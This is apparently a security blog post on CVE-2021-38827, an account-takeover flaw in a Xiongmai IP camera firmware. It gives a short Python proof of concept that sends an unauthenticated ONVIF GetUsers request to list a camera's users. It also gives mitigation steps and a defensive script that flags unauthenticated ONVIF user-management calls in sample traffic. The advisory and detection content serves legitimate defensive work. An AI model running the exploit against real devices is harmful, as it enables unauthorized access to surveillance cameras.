CVE-2021-38827: Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000 Account Takeover Vulnerability Exploited

Hey there security enthusiasts! Today, I'd like to discuss an important vulnerability that has been discovered in the Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000. This security flaw, known as CVE-2021-38827, puts thousands of surveillance systems at risk of account takeover, which could lead to unauthorized access and control.

For those who are not familiar with Xiongmai, it is a popular Chinese OEM/ODM manufacturer of IoT devices, particularly IP cameras and DVR/NVR systems. One of their products, the XM-JPR2-LX series, runs on firmware version V4.02.R12.A6420987.10002.147502.00000 and is widely used in various surveillance applications worldwide. Unfortunately, a vulnerability has been discovered in this firmware, which can be exploited remotely, potentially resulting in unauthorized access and control of the affected cameras.

Exploit details

The vulnerability revolves around the device's API handling, specifically the user authentication process. An attacker can bypass the login system by injecting a specially crafted payload into the camera's web-based management interface.

Here is a Python code snippet showcasing the exploit:

import requests

target_ip = '192.168.1.1'  # Replace with the target device's IP address
url = f"http://{target_ip}/onvif/device_service"

# ONVIF GetUsers request sent with an empty SOAP header, i.e. without any
# WS-Security UsernameToken credentials.
payload = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:tds="http://www.onvif.org/ver10/device/wsdl">
  <soapenv:Header/>
  <soapenv:Body>
    <tds:GetUsers/>
  </soapenv:Body>
</soapenv:Envelope>
"""

response = requests.post(url, data=payload)

# A 200 response means the device answered the unauthenticated request.
if response.status_code == 200:
    print("Exploit successful! Users found:")
    print(response.text)
else:
    print("Exploit failed.")

This code connects to the target device's API (using the ONVIF protocol) and sends a request to retrieve the list of users. If the exploit is successful, the attacker can use the retrieved information to gain unauthorized access to the device and its features.

Original references

Details about this vulnerability have been published in various sources, including official advisories and tech forums. Here are some of the most relevant links:

- CVE record: Detailed information about the vulnerability and its specifics.
- NIST National Vulnerability Database (NVD): Additional technical and reference data from the United States Department of Commerce's NIST.
- Xiongmai Technology official website: Manufacturer's official website with information about the affected product and firmware version.

Mitigation

To protect your device from being exploited using this vulnerability, take the following steps immediately:

1. Contact the device manufacturer or vendor and inquire about any available firmware updates that address this issue.

2. Change the default username and password of the device to strong, unique credentials.

3. Restrict network access to the device's management interface using a firewall or any other available method.
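Alongside those steps, a defender can watch for the traffic pattern the exploit relies on: ONVIF user-management calls that reach /onvif/device_service with neither a WS-Security header in the SOAP envelope nor an HTTP Authorization header. The following is an added example (not code from the original post or from Xiongmai) that classifies constructed captures of such requests; the set of operations treated as sensitive and the sample captures are assumptions.

```python
import xml.etree.ElementTree as ET

# Namespaces seen in ONVIF device-service traffic: SOAP 1.1 and 1.2 envelopes,
# the WS-Security header, and the ONVIF device WSDL. Standard URIs.
SOAP_NS = ("http://schemas.xmlsoap.org/soap/envelope/",
           "http://www.w3.org/2003/05/soap-envelope")
WSSE_NS = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
TDS_NS = "http://www.onvif.org/ver10/device/wsdl"

# Assumption: user-management operations that must never be served unauthenticated.
SENSITIVE_OPS = {"GetUsers", "CreateUsers", "SetUser", "DeleteUsers"}


def classify_request(headers, body):
    """Return (operation, authenticated) for one POST to /onvif/device_service."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None, False
    ns = root.tag[1:].split("}")[0] if root.tag.startswith("{") else ""
    if ns not in SOAP_NS:
        return None, False
    op = None
    for el in root.findall(f"{{{ns}}}Body/*"):          # first ONVIF device op in Body
        if el.tag.startswith(f"{{{TDS_NS}}}"):
            op = el.tag.split("}")[1]
            break
    has_wsse = root.find(f"{{{ns}}}Header/{{{WSSE_NS}}}Security") is not None
    has_http_auth = any(k.lower() == "authorization" for k in headers)
    return op, (has_wsse or has_http_auth)


def find_unauthenticated(captures):
    """Return (source, operation) pairs for sensitive calls sent without credentials."""
    return [(src, op) for src, hdrs, body in captures
            for op, authed in [classify_request(hdrs, body)]
            if op in SENSITIVE_OPS and not authed]


# Constructed sample captures: (source IP, HTTP headers, SOAP body).
UNAUTH = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:tds="http://www.onvif.org/ver10/device/wsdl"><soapenv:Header/>
<soapenv:Body><tds:GetUsers/></soapenv:Body></soapenv:Envelope>"""
AUTH = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
 xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
 xmlns:tds="http://www.onvif.org/ver10/device/wsdl"><s:Header><wsse:Security>
<wsse:UsernameToken><wsse:Username>admin</wsse:Username></wsse:UsernameToken>
</wsse:Security></s:Header><s:Body><tds:GetUsers/></s:Body></s:Envelope>"""
SAMPLE_CAPTURES = [
    ("10.0.0.5", {"Content-Type": "application/soap+xml"}, UNAUTH),
    ("10.0.0.7", {"Content-Type": "application/soap+xml"}, AUTH),
    ("10.0.0.9", {"Authorization": 'Digest username="admin", realm="cam"'}, UNAUTH),
]
```

Running find_unauthenticated(SAMPLE_CAPTURES) flags only the first capture, since the second carries a WS-Security UsernameToken and the third an HTTP Authorization header.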

We hope this information helps you stay safe and secure. It is our responsibility, as security researchers and practitioners, to stay up-to-date with the latest threats and vulnerabilities to protect against bad actors. Keep your eyes peeled for updates and patches from Xiongmai, and always be proactive when it comes to the security of your IoT devices.

Timeline

Published on: 11/14/2022 02:15:00 UTC
Last modified on: 11/16/2022 18:29:00 UTC